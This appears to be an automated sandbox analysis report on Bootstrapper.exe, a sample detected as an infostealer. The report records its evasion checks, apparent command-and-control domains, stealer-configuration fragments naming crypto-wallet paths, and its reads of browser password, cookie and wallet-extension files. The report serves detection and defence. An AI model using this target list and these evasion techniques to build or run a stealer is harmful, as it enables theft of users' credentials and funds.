                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49788 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49801 version: TLS 1.2
                Source: C:\Users\user\Desktop\Bootstrapper.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007BE180 NtAllocateVirtualMemory,0_2_007BE180
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007BE6C0 NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_007BE6C0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007C10400_2_007C1040
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007370100_2_00737010
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007210000_2_00721000
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007F51D00_2_007F51D0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007D01A00_2_007D01A0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0073D1800_2_0073D180
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0073B3000_2_0073B300
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007C43000_2_007C4300
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007344700_2_00734470
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007F94700_2_007F9470
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007DC4E00_2_007DC4E0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007A24D00_2_007A24D0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007C55700_2_007C5570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007255A00_2_007255A0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0073C5A00_2_0073C5A0
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007386300_2_00738630
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: String function: 00791E90 appears 72 times
                Source: Bootstrapper.exe, 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe
                Source: Bootstrapper.exe, 00000000.00000003.2344349109.0000000002295000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe
                Source: Bootstrapper.exeBinary or memory string: OriginalFilenameDisufranchisemeant.exeD$ vs Bootstrapper.exe
                Source: Bootstrapper.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: Bootstrapper.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Bootstrapper.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Bootstrapper.exe, 00000000.00000003.2394858864.0000000002905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile read: C:\Users\user\Desktop\Bootstrapper.exeJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Bootstrapper.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Bootstrapper.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Admin\Workspace\3927856\Project\Release\Project.pdb source: Bootstrapper.exe
                Source: Bootstrapper.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Bootstrapper.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Bootstrapper.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Bootstrapper.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Bootstrapper.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Bootstrapper.exeStatic PE information: section name: .fptable
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C14AE push edi; retf 0_3_016C14C1
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C14AE push edi; retf 0_3_016C14C1
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C09A8 push esp; retf 0_3_016C09A9
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C09A8 push esp; retf 0_3_016C09A9
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C14AE push edi; retf 0_3_016C14C1
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C14AE push edi; retf 0_3_016C14C1
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C09A8 push esp; retf 0_3_016C09A9
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016C09A8 push esp; retf 0_3_016C09A9
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E654A push ecx; retf 0_3_016E6570
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_3_016E0D4F push esi; retf 0_3_016E0D50
                Source: C:\Users\user\Desktop\Bootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Bootstrapper.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeAPI coverage: 5.2 %
                Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 3332Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exe TID: 3332Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_00795070 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_00795070
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_00785650 GetSystemInfo,0_2_00785650
                Source: Bootstrapper.exe, 00000000.00000003.2549756162.000000000164C000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550498182.000000000164C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/}
                Source: C:\Users\user\Desktop\Bootstrapper.exeAPI call chain: ExitProcess graph end nodegraph_0-10188
                Source: C:\Users\user\Desktop\Bootstrapper.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0077C670 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0077C670
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_007BE890 mov eax, dword ptr fs:[00000030h]0_2_007BE890
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_00737010 GetProcessHeap,GetStdHandle,GetCurrentThread,0_2_00737010
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0077C670 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0077C670

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Bootstrapper.exeString found in binary or memory: hummskitnj.buzz
                Source: Bootstrapper.exeString found in binary or memory: cashfuzysao.buzz
                Source: Bootstrapper.exeString found in binary or memory: appliacnesot.buzz
                Source: Bootstrapper.exeString found in binary or memory: screwamusresz.buzz
                Source: Bootstrapper.exeString found in binary or memory: inherineau.buzz
                Source: Bootstrapper.exeString found in binary or memory: scentniej.buzz
                Source: Bootstrapper.exeString found in binary or memory: rebuildeso.buzz
                Source: Bootstrapper.exeString found in binary or memory: prisonyfork.buzz
                Source: Bootstrapper.exeString found in binary or memory: dxkushha.com
                Source: C:\Users\user\Desktop\Bootstrapper.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_0077C440 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0077C440
                Source: C:\Users\user\Desktop\Bootstrapper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551440466.0000000002902000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.000000000167C000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2549826611.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502391629.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Bootstrapper.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Bootstrapper.exeString found in binary or memory: x\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electru
                Source: Bootstrapper.exeString found in binary or memory: s/ElectronCash
                Source: Bootstrapper.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: Bootstrapper.exeString found in binary or memory: window-state.json
                Source: Bootstrapper.exe, 00000000.00000003.2480264844.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":
                Source: Bootstrapper.exeString found in binary or memory: Wallets/Ethereum
                Source: Bootstrapper.exe, 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Bootstrapper.exe, 00000000.00000003.2480264844.000000000167C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
